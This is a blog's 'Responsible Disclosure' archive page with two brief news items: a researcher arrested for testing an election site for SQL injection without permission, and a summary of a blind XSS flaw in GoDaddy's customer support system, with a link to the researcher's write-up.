Skip navigation

Category Archives: Responsible Disclosure

How Not to do Responsible Disclosure

A security researcher in Florida has been arrested after exposing SQLi vulnerabilities in an election-related webapp, but apparently, he didn’t have any sort of permission to do so.

 

OOPS!

Blind XSS in GoDaddy’s Internal Customer Support System

“…the issue was that the GoDaddy customer support application pulled data from a shared database that my XSS payload was stored in and then reflected it insecurely into the page – causing this XSS vulnerability.”

https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

An InfoSec researcher was playing around when registering his GoDaddy account and set his name to a Cross-Site Scripting payload, as a joke.  Months later, there was an issue that required contacting GoDaddy’s support line, but it soon became apparent that the “joke” would actually allow a malicious actor to take control of any GoDaddy support representative’s session and do anything with their permissions.

TL;DR: Read the page, it’s short and to-the-point